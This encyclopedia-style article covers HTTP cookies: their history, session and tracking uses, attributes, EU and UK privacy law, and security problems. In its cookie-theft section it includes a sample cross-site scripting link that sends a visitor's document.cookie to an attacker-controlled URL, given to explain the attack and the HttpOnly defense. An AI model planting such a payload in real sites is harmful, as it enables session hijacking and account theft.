A cookie is defined by the HTTP communication protocol as a small text sent by an HTTP server to an HTTP client, which the latter will send back the next time it connects to servers sharing the same domain name.
Invented in 1994, the cookie is a text containing an arbitrary sequence of key-value pairs. It allows websites to track users as they move from one page of the site to another, or even when they return a few days later in the case of cookies saved on the visitor’s terminal. Cookies are used in particular to identify the session of an Internet user logged in to an account. More generally, cookies are used to attach state information to a visit, such as display preferences or the contents of a shopping cart.
Cookies have always been more or less controversial because they make it possible to track Internet users visiting seemingly unrelated websites, as long as these sites all use the same web tracking provider, for example, an advertising broadcaster. Most web browsers allow users to manage cookies (storage time, selective deletion). Websites complying with the Directive of July 12, 2002 on the protection of privacy in the electronic communications sector also allow Internet users to selectively accept cookies.
Being usually stored in simple text files, cookies are not executable. They are neither spyware nor viruses. However, cookies that are only used for tracking are detected by several antivirus software programs that offer to delete them.
History of the HTTP cookie
The term cookie derives from the English term magic cookie, which is a packet of data that a program receives and returns unchanged. Cookies were already used in computer science when Lou Montulli had the idea of using them in web communications in June 1994. At that time, he was an employee of Netscape Communications.
John Giannandrea and Lou Montulli wrote the first Netscape Navigator cookie specification that same year. Version 0.9 Beta of Mosaic Netscape, released on October 13, 1994, incorporated cookie technology. The first use of cookies (excluding experimentation) was made to determine whether visitors to the Netscape website had visited the site before. Montulli filed a patent application for the cookie technology in 1995, and the US patent 5774670 was granted in 1998.
After being implemented in Netscape 0.9 beta in 1994, cookies were integrated into Internet Explorer 2, released in October 1995.
The introduction of cookies was not widely known to the public at first. In particular, cookies were accepted by default in browser settings, and users were not informed of their presence. Some people were aware of the existence of cookies around the first quarter of 1995, but the general public did not learn of their existence until after the Financial Times published an article on February 12, 1996. In the same year, cookies received a lot of attention from the media because of possible intrusions into privacy. The subject of cookies was discussed in two consultations of the US Federal Trade Commission in 1996 and 1997.
The development of the official cookie specification was already underway. The first discussions on the official specification took place in April 1995 on the www-talk mailing list. A special working group of the IETF was formed. Two alternative proposals to introduce a state into HTTP transactions were proposed by Brian Behlendorf and David Kristol respectively, but the group, led by Kristol himself, decided to use the Netscape specification as a starting point. In February 1996, the working group determined that third-party cookies were a significant threat to privacy. The specification produced by the group was eventually released as RFC 2109.
Since the end of 2014, banners about cookies have appeared on many sites. At least one browser extension prevents such banners from being displayed.
HTTP Cookie Uses
Session Management
Cookies can be used to maintain data relating to the user while the user navigates a site, and also across several visits. Cookies were introduced to provide a way to implement electronic shopping carts, devices that allow users to accumulate the items they want to buy while browsing the site.
Nowadays, applications like shopping carts instead save the list of items in a database on a server, which is preferable to saving them in the cookie itself. The web server sends a cookie containing a unique session ID. The web browser then returns this session ID with each subsequent request, and the items in the shopping cart are saved and associated with this same unique session ID.
Cookies are useful when connecting to a site using identifiers:
- The web application sends a cookie containing a unique session ID during the first login;
- The user provides their credentials (usually a username and password) when authenticating;
- The web application validates the authentication and allows the user to access the service; the cookie then preserves the fact that the login has been validated, and thus avoids asking the user for login information again on each access.
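The login steps above can be sketched as follows. This is a minimal illustration, not a production design: the in-memory `USERS` and `SESSIONS` stores and the function names are assumptions made for the example, and a real site would keep hashed passwords in a database.

```python
import secrets

# Hypothetical in-memory stores; a real site would use a database.
USERS = {"alice": "correct horse"}   # username -> password (plain text only for illustration)
SESSIONS = {}                        # session ID -> session state


def start_session():
    """Create a session and return the ID to send to the browser in a cookie."""
    session_id = secrets.token_hex(16)
    SESSIONS[session_id] = {"user": None}
    return session_id


def log_in(session_id, username, password):
    """Validate credentials and remember the result in the server-side session."""
    if session_id in SESSIONS and USERS.get(username) == password:
        SESSIONS[session_id]["user"] = username
        return True
    return False


def current_user(session_id):
    """Return the logged-in user for the session ID carried by the cookie, if any."""
    return SESSIONS.get(session_id, {}).get("user")
```

Only the session ID travels in the cookie; the fact that the login was validated stays on the server and is looked up again on each request.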
Customization
Cookies can be used to remember information about the user of a site, with the aim of showing him appropriate content in the future. For example, a web server may send a cookie containing the last username used to log in to that website, so that this username can be pre-populated on future visits.
Many websites use cookies for personalization based on user preferences. Users select their preferences in a form and send them to the server. The server encodes preferences in a cookie and sends it back to the browser. Subsequently, each time the user accesses a page of this site, the browser returns the cookie and therefore the list of preferences; the server can then customize the page according to the user’s preferences. For example, Wikipedia’s website allows its users to choose the site skin they prefer. The Google search engine allows its users (even if they are not registered) to choose the number of results they want to see on each page of results.
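As a rough sketch of this round trip, the following Python code encodes a set of preferences into a single cookie and decodes it again from the value the browser sends back. The cookie name `prefs` and the URL-encoded format are assumptions chosen for the example; sites are free to encode preferences however they like.

```python
from http.cookies import SimpleCookie
from urllib.parse import urlencode, parse_qs


def preferences_to_set_cookie(prefs):
    """Encode a dict of preferences into one Set-Cookie header line."""
    cookie = SimpleCookie()
    cookie["prefs"] = urlencode(prefs)  # "prefs" is a hypothetical cookie name
    return cookie.output()


def preferences_from_cookie_header(header_value):
    """Decode the preferences from the value of a request's Cookie header."""
    cookie = SimpleCookie()
    cookie.load(header_value)
    if "prefs" not in cookie:
        return {}
    # parse_qs returns lists of values; keep the first value for each key.
    return {key: values[0] for key, values in parse_qs(cookie["prefs"].value).items()}
```

The server would call the first function when the form is submitted and the second on every later request to customize the page.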
Tracking
Tracking cookies (or tracers) are used to track the browsing habits of Internet users. This can also be done in part by using the IP address of the computer requesting a page, or the HTTP “Referer” header that the client sends with each request, but cookies allow for greater accuracy. This can be done as in the following example:
- If the user uses a page of a site, and the request does not contain a cookie, the server assumes that it is the first page visited by the user. The server then creates a random string and sends it to the browser at the same time as the requested page;
- From that moment on, the cookie will be automatically sent by the browser each time a new page of the site is called. The server will send the page as usual but will also record the URL of the page called, the date, the time of the request and the cookie in a log file.
By looking at the log file, it is then possible to see which pages the user visited and in what order. For example, if the file contains a few requests made using the id=abc cookie, this may establish that all of these requests are from the same user. The requested URL, date and time associated with the requests are used to track the user’s navigation.
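The log analysis described above can be illustrated with a few lines of Python. The log entries and their layout are invented for the example; real server logs have their own formats.

```python
from collections import defaultdict

# Hypothetical log entries: (cookie value, timestamp, requested URL).
LOG = [
    ("id=abc", "2024-01-01T10:00:00", "/index.html"),
    ("id=xyz", "2024-01-01T10:00:05", "/index.html"),
    ("id=abc", "2024-01-01T10:01:30", "/news.html"),
    ("id=abc", "2024-01-01T10:04:10", "/contact.html"),
]


def pages_by_visitor(log):
    """Group requested URLs by cookie value, ordered by request time."""
    visits = defaultdict(list)
    # ISO 8601 timestamps sort chronologically when compared as strings.
    for cookie, timestamp, url in sorted(log, key=lambda entry: entry[1]):
        visits[cookie].append(url)
    return dict(visits)
```

Here all requests carrying the id=abc cookie are attributed to the same visitor, and their order gives that visitor's path through the site.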
Third-party cookies and web beacons, explained below, also allow tracking across different sites. Tracking in a single site is usually used for statistical use. On the other hand, tracking in different sites using third-party cookies is usually used by advertising companies to produce anonymous user profiles (which are then used to determine which advertisements should be shown to the user and, if the user’s email address is known, to send him emails corresponding to these advertisements).
Tracking cookies are a risk to the user’s privacy, but they can be deleted easily. Most recent browsers include an option to automatically delete persistent cookies when the application is closed.
Third-party cookies
Images and other objects contained in a web page may reside on servers other than the one hosting the page. To display the page, the browser downloads all these objects. Most websites contain information from different sources. For example, if you enter http://www.exemple.com in your browser, parts of the page will often contain objects or advertisements that come from different sources, that is, from a domain other than http://www.exemple.com. First-party cookies are cookies set by the domain shown in the address bar of the browser. Third-party cookies are set by objects on the page that come from a different domain.
By default, browsers like Mozilla Firefox, Microsoft Internet Explorer, and Opera accept third-party cookies, but users can change the settings in the browser options to block them. Third-party cookies that enable web functionality pose no inherent security risk; however, they are also used to track users from site to site. Major players like Google have announced that they will end third-party cookies starting in 2022, which will have major implications for marketing.
Tools such as Ghostery available for all browsers make it possible to block exchanges between third parties.
Implementation
Cookies are small pieces of data sent by the web server to the browser. The browser returns them unchanged to the server, introducing a state (memory of previous events) into the HTTP transaction that would otherwise be stateless. Without cookies, each retrieval of a web page or component of a web page is an isolated event, independent of other requests made on the same site. In addition to being set by the web server, cookies can also be set by scripting languages such as JavaScript, if it is supported and authorized by the browser.
The official cookie specification recommends that browsers be able to save and resend a minimum number of cookies. Specifically, a browser should be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies for the same server or domain.
According to section 3.1 of RFC 2965, cookie names are case insensitive.
A cookie can specify the date of its expiration, in which case the cookie will be deleted on that date. If the cookie does not specify an expiration date, the cookie is deleted as soon as the user exits the browser. As a result, specifying an expiration date is a way to make the cookie survive through multiple sessions.
For this reason, cookies with an expiration date are said to be persistent. As an example, a sales site can use persistent cookies to save the items that users have placed in their shopping cart (in reality, the cookie can refer to an entry saved in a database of the sales site, and not on the user’s computer). In this way, if users leave their browser without making a purchase and return later, they will find the items in the shopping cart again. If these cookies did not specify an expiration date, they would expire when the browser was closed, and the information about the contents of the shopping cart would be lost.
Cookies can be limited in scope to a specific domain, subdomain, or path on the server that created them.
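The scoping rule can be sketched as a pair of checks on the host and path of a request. This is a simplified illustration with hypothetical function names; it ignores details that real browsers handle, such as IP addresses and public-suffix restrictions.

```python
def domain_matches(request_host, cookie_domain):
    """True if request_host equals cookie_domain or is a subdomain of it."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)


def path_matches(request_path, cookie_path):
    """True if request_path lies at or below cookie_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # Require a path-segment boundary so that "/shop" does not match "/shopping".
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def cookie_applies(request_host, request_path, cookie_domain, cookie_path="/"):
    """Decide whether a cookie with this scope would be sent with the request."""
    return domain_matches(request_host, cookie_domain) and path_matches(request_path, cookie_path)
```

For instance, a cookie scoped to the domain example.org and the path /shop would accompany a request for www.example.org/shop/cart, but not one for www.example.org/shopping.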
Creating a cookie
Web pages are transferred using the Hypertext Transfer Protocol (HTTP). Leaving cookies aside, browsers request a page from a web server by sending it a short text called an HTTP request. For example, to access the www.example.org/index.html page, browsers connect to the www.example.org server and send a request that resembles the following:
GET /index.html HTTP/1.1
Host: www.example.org
(browser → server)
The server responds by sending the requested page, preceded by a similar text; together they are called an HTTP response. This response may contain lines asking the browser to store cookies:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value

(HTML page)
(browser ← server)
The server sends the Set-Cookie line only if it wants the browser to store a cookie. Set-Cookie is a request for the browser to store the string name=value and return it in all future requests to the server. If the browser supports cookies and cookies are allowed in the browser options, the cookie will be included in all subsequent requests made to the same server. For example, the browser requests the www.example.org/news.html page by sending the following request to the www.example.org server:
GET /news.html HTTP/1.1
Host: www.example.org
Cookie: name=value
Accept: */*
(browser → server)
This is a request for another page on the same server, and differs from the first one above because it contains a string that the server previously sent to the browser. In this way, the server knows that this request is related to the previous one. The server responds by sending the requested page, and may add other cookies to the response.
The value of the cookie can be changed by the server by sending a new line Set-Cookie: name=new_value in response to the requested page. The browser then replaces the old value with the new one.
The Set-Cookie line is typically created by a CGI program or other scripting language, not by the HTTP server. The HTTP server (example: Apache) will only transmit the result of the program (a document preceded by the header containing the cookies) to the browser.
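As an illustration of what such a program does, the sketch below uses Python's standard http.cookies module to build the Set-Cookie line and, later, to parse the Cookie header sent back. The browser's part is only simulated by string handling here.

```python
from http.cookies import SimpleCookie

# Server side: build the Set-Cookie line for the response.
response_cookie = SimpleCookie()
response_cookie["name"] = "value"
set_cookie_line = response_cookie.output()      # "Set-Cookie: name=value"

# Browser side (simulated): keep the pair and echo it in the next request.
cookie_header = "Cookie: " + response_cookie["name"].OutputString()

# Server side again: parse the Cookie header of the follow-up request.
request_cookie = SimpleCookie()
request_cookie.load(cookie_header[len("Cookie: "):])
received_value = request_cookie["name"].value
```

The value the server reads from the follow-up request is the same string it originally asked the browser to store.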
Cookies can also be set by JavaScript or other similar languages running in the browser, i.e., on the client side rather than on the server side. In JavaScript, the document.cookie property is used for this purpose. For example, the statement document.cookie = "temperature=20" creates a cookie named “temperature” with a value of 20.
Attributes of a cookie
In addition to the name/value pair, a cookie can also contain an expiration date, a path, a domain name and the type of connection intended, i.e., in clear or encrypted. RFC 2965 also states that cookies must have a mandatory version number, but this is usually omitted. These attributes follow the name=new_value pair and are separated by semicolons. For example, a cookie can be created by the server by sending the line Set-Cookie: name=new_value; expires=date; path=/; domain=.example.org.
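A server-side program might assemble such a line as in the following sketch, which uses Python's standard http.cookies module. The expiration date is an arbitrary illustrative value.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["name"] = "new_value"
morsel = cookie["name"]
morsel["expires"] = "Fri, 31 Dec 2038 23:59:59 GMT"  # illustrative date
morsel["path"] = "/"
morsel["domain"] = ".example.org"
morsel["secure"] = True        # only send over encrypted connections

# One header line: the name=value pair followed by the
# semicolon-separated attributes set above.
header_line = cookie.output()
```

The module decides the order and capitalization of the attributes in the output; browsers treat attribute names as case-insensitive, so this does not affect the meaning of the header.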
Expiration of a cookie
Cookies expire and are then not sent by the browser to the server in the following situations:
- when the browser is closed, if the cookie is not persistent;
- when the expiry date of the cookie is exceeded;
- when the expiration date of the cookie is changed (by the server or script) to a date of the past;
- when the browser deletes the cookie at the request of the user.
The third situation allows servers or scripts to explicitly delete a cookie. Note that it is possible with the Google Chrome web browser to know the expiration date of a particular cookie by accessing the content settings. A cookie stored on a computer can very well remain there for several decades if no procedure is done to delete it.
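The explicit deletion described in the third situation can be sketched as follows. The helper name `deletion_header` and the placeholder value are assumptions for the example; what matters is the expiration date in the past.

```python
from http.cookies import SimpleCookie


def deletion_header(name, path="/"):
    """Return a Set-Cookie line that asks the browser to discard `name`."""
    cookie = SimpleCookie()
    cookie[name] = "deleted"   # placeholder value; the browser discards it anyway
    cookie[name]["path"] = path
    cookie[name]["expires"] = "Thu, 01 Jan 1970 00:00:00 GMT"  # a date in the past
    return cookie.output()
```

The path (and domain, if one was set) should generally match the one used when the cookie was created, otherwise the browser may treat the line as referring to a different cookie.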
Misconceptions
Since their introduction, many ideas about cookies have circulated on the Internet and in the media. In 1998, CIAC, a computer incident monitoring team at the U.S. Department of Energy, determined that the cookie security flaws were “essentially non-existent” and explained that “information about where you came from and the details of the web pages you visited already exists in the log files of the web servers.” In 2005, Jupiter Research published the results of a study in which a significant percentage of respondents believed the following claims:
- cookies are like viruses, they infect users’ hard drives;
- cookies generate pop-ups;
- cookies are used to send spam;
- cookies are used only for advertising.
Cookies cannot delete or read information from the user’s computer. However, cookies make it possible to detect the web pages visited by a user on a given site or set of sites. This information may be collected in a user profile that can be used or resold to third parties, which can pose serious privacy concerns. Some profiles are anonymous, in the sense that they do not contain personal information, yet even such profiles may be questionable.
According to the same study, a large percentage of Internet users do not know how to delete cookies. One of the reasons people don’t trust cookies is that some sites have abused the personal identification aspect of cookies and shared this information with other sources. A large percentage of targeted advertising and unsolicited emails, considered spam, come from information gleaned by tracking cookies.
In reality, cookies, which were not initially created for commercial advertising, have given rise to an entire advertising industry that, according to the president of the Digital Commission of the Union of Consulting and Media Buying Companies, “gives information on Internet users, including their interest in this or that product, maybe an intention to buy.”
The removal of third-party cookies planned between 2020 and 2022 is intended to limit these drawbacks but could benefit the GAFAM companies to the detriment of other advertisers: the GAFAMs, which already hold three-quarters of the French market, would be strengthened by better-targeted advertising technologies.
Browser settings
Most browsers support cookies and allow the user to disable them. The most common options are:
- enable or disable cookies completely, so that they are accepted or blocked constantly;
- allow the user to see the cookies active on a given page, by entering javascript:alert(document.cookie) in the address bar of the browser. Some browsers also incorporate a cookie manager that lets the user selectively view and delete the cookies currently stored by the browser.
Most browsers also allow a total deletion of personal data which includes cookies. Add-ons to control cookie permissions also exist.
Privacy and third-party cookies
Cookies have important implications for the privacy and anonymity of web users. Although cookies are only sent back to the server that set them or to a server belonging to the same Internet domain, a web page may nevertheless contain images or other components stored on servers belonging to other domains. Cookies that are set during the retrieval of these external components are called third-party cookies. This includes cookies from unwanted pop-ups.
Advertising companies use third-party cookies to track users through the different sites they visit. In particular, an advertising company can track a user through all the pages where it has placed advertising images or a web beacon. Knowledge of the pages visited by the user allows the advertising company to target the user’s advertising preferences.
The ability to build a user profile is considered by some to be an invasion of privacy, especially when tracking is done across different domains using third-party cookies. For this reason, some countries have cookie legislation.
The U.S. government put in place strict rules on setting cookies in 2000, after it was revealed that the White House’s Office of Drug Policy used cookies to track the computers of users viewing drug ads online. In 2002, privacy activist Daniel Brandt discovered that the CIA left persistent cookies on computers that had visited its websites. Once informed of this breach, the CIA declared that these cookies were not intentionally sent and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had left two persistent cookies on visitors’ computers because of a software update. After being notified, the NSA immediately disabled the cookies.
In the United Kingdom, the “Cookie law”, which came into force on 25 May 2012, requires sites to declare their intentions, allowing users to choose whether or not they want to leave traces of their passage on the Internet. This way, they can be protected from ad targeting. However, according to The Guardian, the consent of Internet users is not necessarily explicit; changes have been made to the terms of user consent, thus making it implicit.
Legal framework
Directive 2002/58 on privacy
Directive 2002/58 on privacy and electronic communications contains rules on the use of cookies. In particular, Article 5(3) of that directive requires that the storage of data (such as cookies) on the user’s computer can only be done if:
- the user is informed of how the data is used;
- the user is given the opportunity to refuse this storage operation.
However, this article also states that the storage of data for technical reasons is exempt from this requirement.
Although the Directive was due to be implemented by October 2003, it was put into practice only very imperfectly according to a report of December 2004, which also pointed out that some Member States (Slovakia, Latvia, Greece, Belgium and Luxembourg) had not yet transposed the Directive into national law.
According to the opinion of the G29 of 2010, this directive, which makes the use of cookies for behavioral advertising purposes conditional on the explicit consent of the Internet user, remains very poorly applied. In fact, most sites do this in a way that does not comply with the directive, limiting themselves to a simple “banner” informing about the use of “cookies” without giving information on uses, without differentiating between “technical” cookies and “tracking” cookies, or offering real choice to the user wishing to maintain technical cookies (such as shopping cart management cookies) and refuse “tracking” cookies. In fact, many sites do not function properly if cookies are refused, which is neither in accordance with Directive 2002/58 nor Directive 95/46 (Protection of personal data).
Directive 2009/136/EC
This matter was updated by Directive 2009/136/EC dated November 25, 2009, which states that the “storage of information, or obtaining access to information already stored, in the terminal equipment of a subscriber or user is permitted only if the subscriber or user has given his consent, after having received, in compliance with Directive 95/46/EC, clear and complete information, inter alia on the purposes of the processing”. The new directive therefore reinforces the obligations that apply before cookies are placed on the Internet user’s computer.
In the preliminary considerations of the Directive, however, the European legislator states: “Where technically possible and effective, in accordance with the relevant provisions of Directive 95/46/EC, the user’s consent to the processing may be expressed through the use of the appropriate settings of a browser or other application”. In practice, however, no browser to date makes it possible to separate the essential technical cookies from the optional ones that should be left to the user’s choice.
This new directive was transposed by Belgian MEPs in July 2012. A 2014 study shows that even MEPs are struggling to apply the constraints of the directive.
Limits of the CNIL
In France, the Council of State considers that the CNIL cannot “legally prohibit (…) ‘cookie walls’, a practice that consists in blocking access to a website in the event of refusal of cookies”: “By inferring such a prohibition from the sole requirement of free consent of the user to the placement of trackers, as laid down by the European General Data Protection Regulation (GDPR), the CNIL has exceeded what it could legally do”.
Technical framework
P3P
The P3P specification includes the ability for a server to state a privacy policy, which defines what kind of information it collects and for what purpose. These policies include (but are not limited to) the use of information collected using cookies. According to the definitions of P3P, a browser can accept or reject cookies by comparing privacy policies with the user’s preferences or by asking the user, presenting him with the privacy policy declared by the server.
Many browsers, including Apple Safari and Microsoft Internet Explorer versions 6 and 7, support P3P which allows the browser to determine whether to accept the storage of third-party cookies. The Opera browser allows users to refuse third-party cookies and create a global and specific security profile for Internet domains. Mozilla Firefox version 2 had dropped support for P3P but reinstated it in version 3.
Most browsers can block third-party cookies in order to increase privacy and reduce advertising tracking, without negatively affecting the user’s web experience. Many advertising agencies offer an opt-out from targeted advertising by setting a generic cookie in the browser that disables this targeting. Even when it is respected, such a solution is not effective in practice, because the generic cookie is removed as soon as the user deletes cookies, which cancels the opt-out decision.
Disadvantages of cookies
In addition to privacy issues, cookies also have some technical drawbacks. In particular, they do not always identify users accurately, they can slow down sites when present in large numbers, they can be used for security attacks, and they conflict with representational state transfer (REST), an architectural style for software.
Inaccurate identification
If more than one browser is used on a computer, each of them has its own separate cookie store. Cookies therefore do not identify a person, but the combination of a user account, a computer, and a web browser. Anyone who uses that account, computer, and browser is associated with the same set of cookies. Similarly, cookies do not differentiate between multiple users who share the same user account, computer, and browser, as in Internet cafés or other places offering open access to computers.
In practice, however, this caveat is misleading in most cases: today a “personal” computer (or, even more so, a smartphone or tablet) is used mostly by a single individual. Tracking it therefore amounts to targeting a specific person, and the volume of information collected allows personalized targeting even if the person is not identified by name.
Cookie theft
During normal operation, cookies are returned between the server (or a group of servers in the same domain) and the browser of the user’s computer. Since cookies may contain sensitive information (username, password used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is an act of interception of cookies by an unauthorized third party.
Cookies can be stolen via a packet sniffer in an attack called session hijacking. Network traffic can be intercepted and read by computers other than those sending and receiving it (especially on unencrypted public Wi-Fi networks). This traffic includes cookies sent over sessions using ordinary HTTP. When network traffic is not encrypted, malicious users can thus read the communications of other users on the network using packet sniffers.
This problem can be overcome by encrypting the connection between the user’s computer and the server by using the HTTPS protocol. A server can specify a secure flag while setting a cookie; the browser will only send it over a secure line, such as an SSL connection.
However, many sites, although using HTTPS encrypted communication for user authentication (i.e., the login page), later send session cookies and other data normally, through unencrypted HTTP connections for efficiency reasons. Attackers can thus intercept other users’ cookies and impersonate them on appropriate sites or use them in cookie attacks.
Another way to steal cookies is cross-site scripting, in which the browser itself is made to send cookies to malicious servers that should never receive them. Modern browsers execute pieces of code retrieved from the server. If cookies are accessible during execution, their values can be communicated in some form to servers that should not have access to them. Encrypting cookies before they are sent over the network does not help counter this attack.
This type of cross-site scripting is typically used by attackers on sites that allow users to publish HTML content. By embedding a suitable piece of code in an HTML contribution, an attacker can receive the cookies of other users. The attacker can then log in to the same site with the stolen cookies and be recognized as the user from whom they were stolen.
One way to prevent such attacks is to use the HttpOnly flag, an option introduced in 2002 in Internet Explorer 6 SP1 and available in PHP since version 5.2.0. This option is intended to make the cookie inaccessible to scripts (usually JavaScript) running in the browser. Web developers should take this option into account so that cookies, especially session cookies, cannot be read by scripts running in the user’s browser.
Another security threat is cross-site request forgery.
The official technical specification allows cookies to be sent back only to the servers of the domain from which they originate. However, the value of cookies can be sent to other servers using different means than cookie headers.
In particular, scripting languages like JavaScript are generally allowed to access cookie values and are able to send arbitrary values to any server on the Internet. This scripting capability is exploited on websites that allow users to post HTML content that other users can see.
For example, an attacker operating the example.com domain might post, on a popular blog that they do not otherwise control, a comment containing the following link:
<a href="#" onclick="window.location = 'http://example.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
When another user clicks on this link, the browser executes the code in the onclick attribute, replacing the string document.cookie with the list of the user’s cookies that are active for that page. This list of cookies is therefore sent to the example.com server, and the attacker is able to collect that user’s cookies.
This type of attack is difficult to detect on the user side because the script comes from the same domain that set the cookie, and the operation of sending values seems to be allowed by this domain. It is considered that it is the responsibility of administrators operating this type of site to put in place restrictions preventing the publication of malicious code.
Cookies are not directly visible to client-side programs like JavaScript if they were sent with the HttpOnly flag. From the server’s point of view, the only difference is that a new field containing the string HttpOnly is added to the Set-Cookie header line:
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.example.net; HttpOnly
When the browser receives such a cookie, it is supposed to use it normally in the next HTTP exchange, but without making it visible to scripts executed on the client side. The HttpOnly flag began as a browser-specific extension and was later specified in RFC 6265; older browsers may not implement it. Historically, some browsers also did not prevent the XMLHttpRequest method from reading such cookies from response headers.
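A server-side program could produce a header of this kind as in the following sketch, which uses Python's standard http.cookies module and reuses the illustrative cookie name and value from the example above. Adding the Secure flag alongside HttpOnly is a choice made for this example, so that the cookie is also withheld from unencrypted connections.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["RMID"] = "732423sdfs73242"
cookie["RMID"]["path"] = "/"
cookie["RMID"]["domain"] = ".example.net"
cookie["RMID"]["httponly"] = True   # hide the cookie from client-side scripts
cookie["RMID"]["secure"] = True     # send it only over encrypted connections

header_line = cookie.output()
```

Both flags are valueless attributes: they appear in the header as bare words and are simply omitted when not set.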
Changing cookies
Since cookies are stored on the client and are meant to be sent back to the server unchanged, an attacker can modify their values before they are sent back. For example, if a cookie contains the total amount the user must pay for the items in the shopping cart, changing this value exposes the server to the risk of charging the attacker less than the actual price. The process of changing the value of cookies is called cookie poisoning and can be used after a cookie theft to make the attack persistent.
Most websites, however, only store a session ID — a randomly generated unique number used to identify the session user — in the cookie itself, while all the rest of the information is stored on the server. In this case, this problem is largely solved.
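The following sketch shows why keeping only a session ID in the cookie limits the damage: the amount to pay is computed from data the client never sees. The `PRICES_CENTS` and `CARTS` stores and the session ID are invented for the example.

```python
# Hypothetical server-side data; neither prices nor cart contents are sent to the client.
PRICES_CENTS = {"book": 1250, "pen": 120}
CARTS = {"3f9a": ["book", "pen", "pen"]}   # session ID -> items in the cart


def amount_due_cents(session_id):
    """Compute the total from server-side data, keyed by the session ID cookie."""
    items = CARTS.get(session_id)
    if items is None:
        raise KeyError("unknown session")
    return sum(PRICES_CENTS[item] for item in items)
```

An attacker who alters the cookie can at most present a different or invalid session ID; the price itself cannot be changed from the client. Guessing another user's session ID remains a risk, which is why such IDs need to be long and random.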
Cookie manipulation between websites
Each site is supposed to have its own cookies, so one site should not be able to modify or create cookies associated with another site. A security flaw in a web browser can allow malicious sites to violate this rule. Exploiting such a flaw is commonly referred to as cross-site cooking. The purpose of such attacks may be the theft of the session ID.
Users should use the latest versions of web browsers in which these vulnerabilities are virtually eliminated.
Contradictory state between client and server
The use of cookies may create a contradiction between the state of the client and the state stored in the cookie. If the user acquires a cookie and then clicks the browser’s “Back” button, the state of the browser is usually not the same as it was before the cookie was acquired.
For example, if the shopping cart of an online store is implemented using cookies, the contents of the cart do not change when the user goes back in the browser history: if the user presses a button to add an item to the cart and then clicks the “Back” button, the item remains in the cart. This may not be what the user intended, since the user probably wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this problem and implement measures to handle such situations.
Cookie expiration
Permanent cookies have been criticized by privacy and security experts because they are not set to expire early enough, and as a result allow websites to track users and progressively build a profile of them. This aspect of cookies is also part of the session hijacking problem, because a stolen permanent cookie can be used to impersonate a user for a considerable period of time.
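The difference between a session cookie and a persistent cookie with a short lifetime can be sketched with Python’s http.cookies module. The helper names and the one-hour lifetime below are illustrative assumptions, not recommendations from any specification.

```python
from http.cookies import SimpleCookie


def session_cookie(name: str, value: str) -> str:
    """Cookie without Expires or Max-Age: discarded when the browser closes."""
    cookie = SimpleCookie()
    cookie[name] = value
    return cookie[name].OutputString()


def persistent_cookie(name: str, value: str, max_age_seconds: int) -> str:
    """Cookie kept on disk until max_age_seconds have elapsed."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["max-age"] = max_age_seconds
    return cookie[name].OutputString()


short_lived = persistent_cookie("sid", "abc123", 3600)  # assumed one-hour lifetime
print(session_cookie("sid", "abc123"))
print(short_lived)
```

A shorter Max-Age narrows the window during which a stolen cookie remains usable, at the cost of asking the user to log in again more often.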
Alternatives to cookies
Some operations that can be performed using cookies can also be carried out using other mechanisms, which make it possible to do without cookies or to recreate deleted cookies. These mechanisms create privacy problems in the same way as cookies, and sometimes worse ones because they are invisible to the user.
IP address
Users can be tracked by the IP address of the computer requesting the page. This technique has been available since the introduction of the World Wide Web: whenever a page is downloaded, the server receives the IP address of the computer running the browser, or of the proxy if one is used. The server can record this information whether or not cookies are used. However, these addresses are typically less reliable than cookies for identifying a user, because computers and proxies can be shared by multiple users, and the same computer can receive a different IP address for each session (as is often the case for dial-up connections).
Tracking by IP address can be reliable in certain situations, such as broadband connections that keep the same IP address for a long time, as long as the equipment stays powered on.
Some systems, such as Tor, are designed to preserve the anonymity of Internet users and make tracking by IP address impossible or impractical.
URL
A more precise technique is based on embedding information in URLs. The query string part of the URL is the part most commonly used for this purpose, but other parts can be used as well. Both the Java servlet and PHP session mechanisms use this method if cookies are not enabled.
In this method, the web server appends query strings to the links of a web page when it sends the page to the browser. When the user follows a link, the browser returns the attached query string to the server.
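The link rewriting described above can be sketched with Python’s urllib.parse module. The parameter name sid and the helper names are assumptions made for the example; real frameworks use their own parameter names.

```python
from typing import Optional
from urllib.parse import parse_qs, parse_qsl, urlencode, urlsplit, urlunsplit


def add_session_id(url: str, session_id: str, param: str = "sid") -> str:
    """Server side: append the session ID to a link before sending the page."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((param, session_id))
    return urlunsplit(parts._replace(query=urlencode(query)))


def read_session_id(url: str, param: str = "sid") -> Optional[str]:
    """Server side: recover the session ID when the browser follows the link."""
    values = parse_qs(urlsplit(url).query).get(param)
    return values[0] if values else None


link = add_session_id("http://example.com/cart?page=2", "abc123")
print(link)
print(read_session_id(link))
```

Every link on the page has to be rewritten this way, which is why the identifier travels with any URL the user copies or shares.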
The query strings used for this purpose and cookies are very similar, both being information arbitrarily chosen by the server and returned by the browser. However, there are a few differences: when a URL containing a query string is reused, the same information is sent to the server. For example, if a user’s preferences are encoded in the query string of a URL and the user sends that URL to another user by email, the recipient will also be able to use those preferences.
On the other hand, when a user accesses the same page twice, there is no guarantee that the same query string will be used both times. For example, if a user arrives on a page from an internal page of the site the first time and arrives on the same page from an external page the second time, the query string for the site page is typically different, whereas cookies are the same.
Other disadvantages of query strings are security-related: keeping data that identifies a session in query strings enables or simplifies session fixation attacks, referrer logging attacks, and other exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form field
One form of session tracking, used by ASP.NET, relies on web forms with hidden fields. This technique is very similar to using URL query strings to carry information and has the same advantages and disadvantages; indeed, if the form is processed with the HTTP GET method, the fields become part of the URL that the browser sends when the form is submitted. But most forms are processed with HTTP POST, in which case the form information, including the hidden fields, is sent in the request body, which is neither part of the URL nor a cookie.
